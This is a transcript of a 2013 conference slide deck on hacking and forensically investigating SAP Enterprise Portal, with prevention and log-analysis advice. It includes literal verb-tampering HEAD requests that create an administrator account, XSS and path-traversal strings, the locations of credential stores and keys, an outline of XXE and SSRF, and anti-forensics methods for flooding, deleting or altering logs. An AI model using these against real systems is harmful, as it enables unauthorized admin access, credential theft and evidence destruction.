sap portal hacking and forensics at confidence 2013
Post on 01-Jun-2018
217 Views
Preview:
TRANSCRIPT
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
1/88
Invest in security
to secure investments
SAP Portal: Hacking and forensicsDmitry Chastukhin Director of SAP pentest/research team
Evgeny Neyolov Security analyst, (anti)forensics research
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
2/88
ERPScan
Leading SAP AG partner in the field of discovering security
vulnerabilities by the number of found vulnerabilities
Developing software for SAP security monitoring
Talks at 35+ security conferences worldwide: BlackHat
(US/EU/DC/UAE), RSA, Defcon, CONFidence, HITB, etc.
First to develop software for NetWeaver J2EE assessment
The only solution to assess all areas of SAP Security Research team with experience in different areas of security
from ERP and web security to mobile, embedded devices, and
critical infrastructure, accumulating their knowledge on SAP
research.
2erpscan.com ERPScan invest in security to secure investments
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
3/88
Dmitry Chastukhin
Business application security
expert
Yet another security
researcher
3erpscan.com ERPScan invest in security to secure investments
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
4/88
Agenda
SAP security
SAP forensics WTF?!
Say hello to SAP Portal
Breaking SAP Portal
Catch me if you can
Conclusion
4erpscan.com ERPScan invest in security to secure investments
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
5/88
SAP
The most popular business application More than 180000 customers worldwide
More than 70% of Forbes 500 run SAP
More than 40% of ERP market in Poland
5erpscan.com ERPScan invest in security to secure investments
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
6/88
SAP security
Espionage Stealing financial information
Stealing corporate secrets
Stealing supplier and customer lists
Stealing HR data
Fraud False transactions
Modification of master data
Sabotage
Denial of service
Modification of financial reports
Access to technology network (SCADA) by trust relations
6erpscan.com ERPScan invest in security to secure investments
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
7/88
0
5
10
15
20
25
30
35
2003 2004 2005 2006 2007 2008 2009 2010 2011 2012 2013
SAP security
BlackHat
Defcon
HITB
RSA
CONFidence
DeepSec
Hacktivity
Troopers
Source
Source: SAP Security in Figures 2013
LINK
7erpscan.com ERPScan invest in security to secure investments
http://erpscan.com/wp-content/uploads/2012/06/SAP-Security-in-figures-a-global-survey-2007-2011-final.pdfhttp://erpscan.com/wp-content/uploads/2012/06/SAP-Security-in-figures-a-global-survey-2007-2011-final.pdf -
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
8/88
8erpscan.com ERPScan invest in security to secure investments
More than 2600 in total
How easy? SAP Security Notes
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
9/88
Is it remotely exploitable?
> 5000 non-web SAP services exposed in the world
including Dispatcher, Message server, SapHostControl, etc.
9erpscan.com ERPScan invest in security to secure investments
sapscan.com
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
10/88
What about other services?
0
1
2
3
4
5
6
7
8
9
SAP Dispatcher SAP MMC SAP Message Server SAP HostControl SAP ITS Agate SAP Message Server httpd
World
10erpscan.com ERPScan invest in security to secure investments
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
11/88
What about unpublished threats?
Companies are not interested in publishing information abouttheir breaches
There are a lot of internal breaches thanks to unnecessarily
given authorizations (An employee by mistake buys hundreds of
excavators instead of ten)
There are known stories about backdoors left by developers in
custom ABAP code
How can you be sure that, if a breach occurs, you can find
evidence?
11erpscan.com ERPScan invest in security to secure investments
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
12/88
If there are no attacks, it doesnt mean anything
Companies dont like to share it
Companies dont use security audit ~10%
Even if used, nobody manages it ~5%
Even if managed, no correlation ~1%
SAP Forensics
erpscan.com 12ERPScan invest in security to secure investments
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
13/88
Typical SAP audit options
ICM log icm/HTTP/logging_0 70% Security audit log in ABAP 10%
Table access logging rec/client 4%
Message Server log ms/audit 2%
SAP Gateway access log 2%
* The percentage of companies is based on our security assessments and product
implementations.
erpscan.com 13ERPScan invest in security to secure investments
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
14/88
What do we see?
A lot of research Real attacks
Lack of logging practice
Many vulnerabilities are hard to close We need to monitor
them, at least
erpscan.com 14ERPScan invest in security to secure investments
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
15/88
What do we need to monitor?
External attacks on SAP
Attack users and SAP GUI
SAP Portal and WEB
Exposed SAP services
SAProuter
* Ideally, we should control everything, but this talk has limits, so lets focus onthe most critical areas.
Awareness
Secure configuration and patch management
Disable them
Too much issues and custom
configuration
Can be 0-days
Need to concentrate on this area
erpscan.com 15ERPScan invest in security to secure investments
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
16/88
Point of web accessto SAP systems
Point of web access to
other corporate systems
Way for attackers
to get access to SAP
from the Internet
Say hello to Portal
erpscan.com 16ERPScan invest in security to secure investments
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
17/88
EP architecture
erpscan.com 17ERPScan invest in security to secure investments
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
18/88
Okay, okay. SAP Portal is important, andit has many links to other modules.
So what?
erpscan.com 18ERPScan invest in security to secure investments
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
19/88
SAP Logging
erpscan.com 19
If you are running an ABAP + Java installation of Web AS withSAP Web Dispatcher as a load balancing solution, you can safely
disable logging of HTTP requests and responses on J2EE Engine,
and use the corresponding CLF logs of SAP Web Dispatcher. This
also improves the HTTP communication performance. The only
drawback of using the Web Dispatchers CLF logs is that no
information is available about the user executing the request
(since the user is not authenticated on the Web Dispatcher, but
on the J2EE Engine instead).
SOURCE: SAP HELP
*Not the only. There are many complex attacks with POST requests.
ERPScan
invest in security to secure investments
http://help.sap.com/saphelp_nw70ehp1/helpdata/en/ef/8cd7f51dfead42ab90537886104269/frameset.htmhttp://help.sap.com/saphelp_nw70ehp1/helpdata/en/ef/8cd7f51dfead42ab90537886104269/frameset.htm -
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
20/88
SAP J2EE Logging
erpscan.com 20
Categories of system events recording: System all system related security and administrative logs
Applications all system events related to business logic
Performance reserved for single activity tracing
Default location of these files in your file system:\usr\sap\\\j2ee\cluster\\log\
ERPScan
invest in security to secure investments
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
21/88
SAP J2EE Logging
erpscan.com 21
The developer trace files of the Java instance\\work
The developer trace files of the central services
\\work\\log
Java server logs
\\j2ee\cluster\server\log
ERPScan
invest in security to secure investments
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
22/88
Full logging is not always the best option
erpscan.com 22ERPScan
invest in security to secure investments
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
23/88
SAP Management Console
erpscan.com 23ERPScan
invest in security to secure investments
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
24/88
SAP Management Console
SAP MMC: centralized system management SAP MMC has remote commands
Commands are simple SOAP requests
Allowing to see the trace and log messages
Its not bad if you only use it sometimes and delete logs afteruse, but
erpscan.com 24ERPScan
invest in security to secure investments
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
25/88
SAP Management Console
erpscan.com 25
What can we find in logs?
Right!
The file userinterface.log contains calculated JSESIONID
But
The attacker must have credentials to read the log file
WRONG!
ERPScan
invest in security to secure investments
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
26/88
SAP Management Console
true
j2ee/cluster/server0/log/system/userinterface.log
%COUNT%
EOF
erpscan.com 26ERPScan
invest in security to secure investments
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
27/88
Prevention
LINK to SAP HELP
Dont use TRACE_LEVEL = 3
Delete traces when work is finished Limit access to dangerous methods
Install notes 927637 and 1439348
Mask security-sensitive data in HTTP access log
erpscan.com 27ERPScan
invest in security to secure investments
http://help.sap.com/saphelp_nwpi71/helpdata/en/d6/49543b1e49bc1fe10000000a114084/frameset.htmhttp://help.sap.com/saphelp_nwpi71/helpdata/en/d6/49543b1e49bc1fe10000000a114084/frameset.htm -
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
28/88
Prevention
LINK to SAP HELP
erpscan.com 28
The HTTP Provider service can mask security-
sensitive URL parameters, cookies, or headers
By default, only for the headers listed below
Path Parameter: jsessionid
Request Parameters: j_password, j_username,
j_sap_password, j_sap_again, oldPassword,
confirmNewPassword,ticket
HTTP Headers: Authorization, Cookie (JSESSIONID,
MYSAPSSO2)
ERPScan
invest in security to secure investments
http://help.sap.com/saphelp_nwce71/helpdata/en/79/77b142c444c96ae10000000a155106/content.htmhttp://help.sap.com/saphelp_nwce71/helpdata/en/79/77b142c444c96ae10000000a155106/content.htm -
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
29/88
SAP NetWeaver J2EE
erpscan.com 29ERPScan
invest in security to secure investments
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
30/88
Access Control
Web Dynpro - programmatic
Portal iViews - programmatic
J2EE Web apps - declarative
erpscan.com 30ERPScan
invest in security to secure investments
ProgrammaticBy UME
DeclarativeBy WEB.XML
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
31/88
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
32/88
web.xml
CriticalActioncom.sap.admin.Critical.Action
CriticalAction
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
33/88
Verb Tampering
If we are trying to get access to an application using GET weneed a login:pass and administrator role
What if we try to get access to application using HEAD instead
GET?
PROFIT!
Did U know about ctc?
erpscan.com 33ERPScan
invest in security to secure investments
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
34/88
Verb Tampering
Need Admin account in SAP Portal?
Just send two HEAD requests
Create new user CONF:idence
HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=CONF,PASSWORD=idence
Add the user CONF to the group Administrators
HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;ADD_USER_TO_GROUP;USERNAME=CONF,GROUPNAME=Administrators
* Works when UME uses JAVA database.
erpscan.com 34ERPScan
invest in security to secure investments
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
35/88
Install SAP notes 1503579, 1616259, 1589525,
1624450
Install other SAP notes about Verb Tampering
Scan applications with ERPScan WEB.XML
checker
Disable the applications that are not necessary
Prevention
erpscan.com 35ERPScan
invest in security to secure investments
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
36/88
Investigation
erpscan.com 36ERPScan
invest in security to secure investments
[Apr 3, 2013 1:23:59 AM ] - 192.168.192.14: GET/ctc/ConfigServlet HTTP/1.1 4011790
[Apr 3, 2013 1:30:01 AM ] - 192.168.192.14
: HEAD/ctc/ConfigServlet HTTP/1.1 2000
[Apr 3, 2013 1:30:01 AM ] - 192.168.192.14
: HEAD
/ctc/ConfigServlet?param=com.sap.ctc.util.Use
rConfig;CREATEUSER;USERNAME=CONF,PASSWORD=idence HTTP/1.0 2000
j2ee\cluster\\log\system\httpaccess\responses.trc
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
37/88
web.xml
CriticalActioncom.sap.admin.Critical.Action
CriticalAction
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
38/88
Invoker Servlet
Want to execute an OS command on J2EE server remotely? Maybe upload a backdoor in a Java class?
Or sniff all traffic?
Still remember ctc?
erpscan.com 38ERPScan
invest in security to secure investments
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
39/88
Invoker Servlet
erpscan.com 39ERPScan
invest in security to secure investments
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
40/88
Prevention
erpscan.com 40ERPScan
invest in security to secure investments
Update to the latest patch 1467771, 1445998
EnableInvokerServletGlobally must be false
Check all WEB.XML files with ERPScan WEBXML
checker
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
41/88
Investigation
erpscan.com 41
#1.5#000C29C2603300790000003A000008700004D974E7CCC6D8#1364996035203#/System/Security/Audit#sap.com/tc~lm~ctc~util~basic_ear#com.sa
p.security.core.util.SecurityAudit#Guest#0#SAP J2EE Engine JTA
Transaction :
[024423a006e18]#n/a##217c5d309c6311e29bca000c29c26033#SAPEngine_A
pplication_Thread[impl:3]_22##0#0#Info#1#com.sap.security.core.ut
il.SecurityAudit#Plain###Guest | USER.CREATE |
USER.PRIVATE_DATASOURCE.un:CONF | | SET_ATTRIBUTE:uniquename=[CONF]#
#1.5#000C29C2603300680002C97A000008700004D974E8354D1D#13649960420
62#/System/Security/Audit/J2EE#sap.com/irj#com.sap.engine.service
s.security.roles.audit#Guest#182818##n/a##0c5bfef08bc511e287e6000
c29c26033#Thread[Thread-50,5,SAPEngine_Application_Thread[impl:3]_Group]##0#0#Info#1#com.
sap.engine.services.security.roles.audit#Java###{0}:
Authorization check for caller assignment to J2EE security role
[{1} : {2}].#3#ACCESS.OK#SAP-J2EE-Engine#guests#
ERPScan
invest in security to secure investments
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
42/88
Investigation
erpscan.com 41ERPScan
invest in security to secure investments
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
43/88
XSS
Many XSSs in Portal
But sometimes HttpOnly
But when we exploit XSS, we can use the features of SAP Portal
erpscan.com 43ERPScan
invest in security to secure investments
EPCF
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
44/88
EPCF
EPCF provides a JavaScript API designed for the client-side
communication between portal components and the portal core
framework
Enterprise Portal Client Manager (EPCM)
iViews can access the EPCM object from every portal pageor IFrame
Every iView contains the EPCM object
alert(EPCM.loadClientData("urn:com.sap.myObjects", "person");
erpscan.com 44ERPScan
invest in security to secure investments
For example, EPCF used for transient user data buffer for iViews
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
45/88
Prevention
Install SAP note 1656549
erpscan.com 45ERPScan
invest in security to secure investments
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
46/88
#Plain###192.168.192.26 : GET/irj/servlet/prt/portal/prtroot/com.sap.porta
l.usermanagement.admin.UserMapping?systemid=M
S_EXCHANGEaaaa%3C/script%3E%3Cscript%3Ealert(
%27xSS%27)%3C/script%3E HTTP/1.1 200 3968#
j2ee\cluster\\log\system\httpaccess\res
ponses.trc
Investigation
erpscan.com 46ERPScan
invest in security to secure investments
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
47/88
Web Dynpro unauthorized modifications
For example:
somebody steals an account using XSS/CSRF/Sniffing
then tries to modify the severity level of logs
Web Dynpro JAVA
erpscan.com 47ERPScan
invest in security to secure investments
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
48/88
Web Dynpro JAVA
LINK to SAP HELP
erpscan.com 48ERPScan
invest in security to secure investments
http://help.sap.com/saphelp_nw70/helpdata/en/42/fa080514793ee6e10000000a1553f7/frameset.htmhttp://help.sap.com/saphelp_nw70/helpdata/en/42/fa080514793ee6e10000000a1553f7/frameset.htm -
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
49/88
No traces of change in default log files
\cluster\server0\log\system\httpaccess\responses.log
Web Dynpro sends all data by POST, and we only see GET URLs inresponses.log But sometimes we can find information by indirect signs
[Mar 20, 2013 9:35:49 AM ] - 172.16.0.63 : GET/webdynpro/resources/sap.com/tc~lm~webadmin~log_config~wd/Components/com.sap.tc.log_configurator.LogConfigur
ator/warning.gif HTTP/1.1 200 110
The client loaded images from the server during some changes
Investigation
erpscan.com 49ERPScan
invest in security to secure investments
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
50/88
Investigation
erpscan.com 50ERPScan
invest in security to secure investments
Most actions have icons
They have to be loaded from the server
Usually, legitimate users have them all in cache
Attackers usually dont have them, so they make requests to the
server Thats how we can identify potentially malicious actions
But there should be correlation with a real users activity
False positives are possible:
New legitimate user Old user clears cache
Other
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
51/88
Directory traversal
FIX
erpscan.com 51ERPScan
invest in security to secure investments
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
52/88
Directory traversal fix bypass
erpscan.com 52ERPScan
invest in security to secure investments
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
53/88
Prevention
erpscan.com 53ERPScan
invest in security to secure investments
Install SAP note 1630293
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
54/88
Investigation
erpscan.com 54ERPScan
invest in security to secure investments
/../
!252f..!252f
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
55/88
Breaking SAP Portal
Found a file in the OS of SAP Portal with the encrypted
passwords for administration and DB
Found a file in the OS of SAP Portal with keys to decrypt
passwords
Found a vulnerability (another one ;)) which allows reading the
files with passwords and keys
Decrypt passwords and log into Portal
PROFIT!
erpscan.com 55ERPScan
invest in security to secure investments
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
56/88
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
57/88
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
58/88
XXE in Portal
erpscan.com 58ERPScan
invest in security to secure investments
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
59/88
XXE in Portal
erpscan.com 59ERPScan
invest in security to secure investments
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
60/88
XXE
Error based XXE
erpscan.com 60ERPScan
invest in security to secure investments
l l
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
61/88
XXE in Portal: Result
We can read any file
Including config with passwords
The SAP J2EE Engine stores the database user SAPDB; its
password is here:\usr\sap\\SYS\global\security\data\SecStore.properties
erpscan.com 61ERPScan
invest in security to secure investments
Where are the passwords?
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
62/88
rdbms.maximum_connections=5
system.name=TTT
secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/
data/SecStore.key
secstorefs.secfile=/oracle/TTT/sapmnt/global/security/
data/SecStore.propertiessecstorefs.lib=/oracle/TTTsapmnt/global/security/lib
rdbms.driverLocation=/oracle/client/10x_64/instantclie
nt/ojdbc14.jar
rdbms.connection=jdbc/pool/TTT
rdbms.initial_connections=1
Where are the passwords?
(config.properties)
erpscan.com 62ERPScan
invest in security to secure investments
Where are the passwords?
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
63/88
rdbms.maximum_connections=5
system.name=TTT
secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/
data/SecStore.key
secstorefs.secfile=/oracle/TTT/sapmnt/global/security/
data/SecStore.propertiessecstorefs.lib=/oracle/TTTsapmnt/global/security/lib
rdbms.driverLocation=/oracle/client/10x_64/instantclie
nt/ojdbc14.jar
rdbms.connection=jdbc/pool/TTT
rdbms.initial_connections=1
Where are the passwords?
(config.properties)
erpscan.com 63ERPScan
invest in security to secure investments
S St ti
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
64/88
$internal/version=Ni4zFF4wMSeaseforCCMxegAfx
admin/host/TTT=7KJuOPPs/+u+14jM7uy7cy7exrZuYvevkSrPxwu
eur2445yxgBS
admin/password/TTT=7KJuOPPs/+uv+14j56vDc7M7v7dytbGbkgq
Dp+QD04b0Fh
jdbc/pool/TTT=7KJuOPPs/+u5jM6s1cvvgQ1gzFvarxuUzEJTHTJI0VGegH
admin/port/TTT=7KJuOPPs/+u+1j4vD1cv6ZTvd336rzEd7267Rwr
4ZUgRTQ
$internal/check=BJRrzfjeUA+bw4XCzdz16zX78ufbt
$internal/mode=encryptedadmin/user/TTT=7KJuOPPs/+u+14j6s14sTxXU3ONl3rL6N7yssV7
5eC6/5S3E
SecStore.properties
But where is the key?
erpscan.com 64ERPScan
invest in security to secure investments
fi ti
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
65/88
rdbms.maximum_connections=5
system.name=TTT
secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/
data/SecStore.key
secstorefs.secfile=/oracle/TTT/sapmnt/global/security/
data/SecStore.propertiessecstorefs.lib=/oracle/TTTsapmnt/global/security/lib
rdbms.driverLocation=/oracle/client/10x_64/instantclie
nt/ojdbc14.jar
rdbms.connection=jdbc/pool/TTT
rdbms.initial_connections=1
config.properties
erpscan.com 65ERPScan
invest in security to secure investments
G t th d
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
66/88
Get the password
We have an encrypted password
We have a key to decrypt it
We got the J2EE admin and JDBC
login:password!
erpscan.com 66ERPScan
invest in security to secure investments
P ti
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
67/88
Prevention
erpscan.com 67
Install SAP note 1619539
Restrict read access to files SecStore.propertiesand SecStore.key
ERPScan
invest in security to secure investments
Investigation
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
68/88
Investigation
erpscan.com 68
POST
/irj/servlet/prt/portal/prteventname/HtmlbE
vent/prtroot/pcd!3aportal_content!2fadminis
trator!2fsuper_admin!2fsuper_admin_role!2fc
om.sap.portal.content_administration!2fcom.
sap.portal.content_admin_ws!2fcom.sap.km.AdminContent!2fcom.sap.km.AdminContentExplore
r!2fcom.sap.km.AdminExplorer/ HTTP/1.1
ERPScan
invest in security to secure investments
Investigation
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
69/88
Investigation
The only one way to get HTTP POST request values is to enable
HTTP Trace
Visual Administrator Dispatcher HTTP Provider
Properties: HttpTrace = enable
For 6.4 and 7.0 SP12 and lower:
On Dispatcher:
/j2ee/cluster/dispatcher/log/defaultTrace.trc
On Server
\j2ee\cluster\server0\log\system\httpaccess\responses.0.trc
For 7.0 SP13 and higher:
/j2ee/cluster/dispatcher/log/services/http/req_resp.trc
Manually analyze all requests for XXE attacks
erpscan.com 69ERPScan
invest in security to secure investments
Malicious file upload: Attack
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
70/88
Malicious file upload: Attack
Knowledge management allows uploading to the server
different types of files that can store malicious content
Sometimes, if guest access is allowed, it is possible to upload
any file without being an authenticated user
For example, it can be an HTML file with JavaScript that steals
cookies
erpscan.com 70ERPScan
invest in security to secure investments
Malicious file upload: Attack
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
71/88
Malicious file upload: Attack
erpscan.com 71ERPScan
invest in security to secure investments
Malicious file upload: Attack
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
72/88
Malicious file upload: Attack
erpscan.com 72ERPScan
invest in security to secure investments
Malicious file upload: Forensics
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
73/88
Malicious file upload: Forensics
[Apr 10, 2013 2:26:13 AM ] - 192.168.192.22 : POST
/irj/servlet/prt/portal/prteventname/HtmlbEvent/prt
root/pcd!3aportal_content!2fspecialist!2fcontentman
ager!2fContentManager!2fcom.sap.km.ContentManager!2
fcom.sap.km.ContentExplorer!2fcom.sap.km.ContentDoc
Explorer!2fcom.sap.km.DocsExplorer/documents
HTTP/1.1 200 13968[Apr 10, 2013 2:26:14 AM ] - 192.168.192.22 : GET
/irj/go/km/docs/etc/public/mimes/images/html.gif
HTTP/1.1 200 165
*Again, images can help us.
erpscan.com 73ERPScan
invest in security to secure investments
Malicious file upload: Prevention
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
74/88
Malicious file upload: Prevention
erpscan.com 74
Enable File Extension and Size Filter:
System Administration System Configuration
Content Management Repository Filters ShowAdvanced Options File Extension and Size Filter
Select either theAll repositories parameter or at least
one repository from the repository list in
the Repositories parameter
ERPScan
invest in security to secure investments
Malicious file upload: Prevention
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
75/88
Malicious file upload: Prevention
erpscan.com 75
Enable Malicious Script Filter:
System Administration System Configuration
Content Management Repository Filters Show
Advanced Options Malicious Script Filter The filter also detects executable scripts in files that are
being modified and encodes them when they are saved
enable Forbidden Scripts. Comma-separated list of banned
script tags that will be encoded when the filter is applied
enable the Send E-Mail to Administrator option
ERPScan
invest in security to secure investments
Portal post-exploitation
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
76/88
Portal post-exploitation
Lot of links to other systems in corporate LAN
Using SSRF, attackers can get access to these systems
What is SSRF?
erpscan.com 76ERPScan
invest in security to secure investments
SSRF History: Basics
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
77/88
We send Packet A to Service A
Service A initiates Packet B to service B
Services can be on the same or different hosts
We can manipulate some fields of packet B within packet A
Various SSRF attacks depend on how many fields we can controlon packet B
SSRF History: Basics
Packet A
Packet B
erpscan.com 77ERPScan
invest in security to secure investments
Partial Remote SSRF:
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
78/88
HTTP attacks on other services
HTTP ServerCorporate
network
Direct attack
GET /vuln.jsp
SSRF Attack
SSRF Attack
Get /vuln.jst
A B
erpscan.com 78ERPScan
invest in security to secure investments
Gopher uri scheme
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
79/88
Gopher uri scheme
Using gopher:// uri scheme, it is possible to send TCP
packets Exploit OS vulnerabilities
Exploit old SAP application vulnerabilities
Bypass SAP security restrictions
Exploit vulnerabilities in local services
More info in our BH2012 presentation:SSRF vs. Business Critical Applications
LINK
erpscan.com 79ERPScan
invest in security to secure investments
Portal post-exploitation
http://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-Businness-critical-applications-whitepaper.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-Businness-critical-applications-whitepaper.pdf -
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
80/88
Portal post exploitation
erpscan.com 80ERPScan
invest in security to secure investments
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
81/88
Anti-forensics
erpscan.com 81ERPScan
invest in security to secure investments
Anti-forensics
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
82/88
Anti forensics
Flooding
Deleting
Changing
erpscan.com 82ERPScan
invest in security to secure investments
Anti-forensics
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
83/88
Anti forensics
Log flooding
5 active logs
Maximum log file size is 10 Mb
Archiving when all logs reach the maximum size
If file.0.log -> max size then open file.1.log If file.4.log -> max size then zip all and backup
Rewriting the same files after archiving
erpscan.com 83ERPScan
invest in security to secure investments
Anti-forensics
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
84/88
Anti forensics
Log deleting
SAP locks write access to the only one active log
SAP allows reading/writing logs, so it is possible to delete them
It could compromise the attackers presence
Log changing
SAP locks write access only to the one active log
It is possible to write into any other log file
erpscan.com 84ERPScan
invest in security to secure investments
Securing SAP Portal
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
85/88
g
Patching
Secure configuration
Enabling HTTP Trace with masking
Malicious script filter
Log archiving Additional place for log storage
Monitoring of security events
Own scripts, parse common patterns
ERPScan has all existing web vulns/0-day patterns
erpscan.com 85ERPScan
invest in security to secure investments
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
86/88
Future work
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
87/88
I'd like to thank SAP's Product Security Response Team for the
great cooperation to make SAP systems more secure. Research
is always ongoing, and we can't share all of it today. If you want
to be the first to see new attacks and demos, follow us at
@erpscan and attend future presentations:
July 31 BlackHat (Las Vegas, USA)
erpscan.com 87ERPScan
invest in security to secure investments
-
8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013
88/88
Web:
www.erpscan.com
e-mail: info@erpscan.com
Twitter:
@erpscan
@_chipik
@neyolov
top related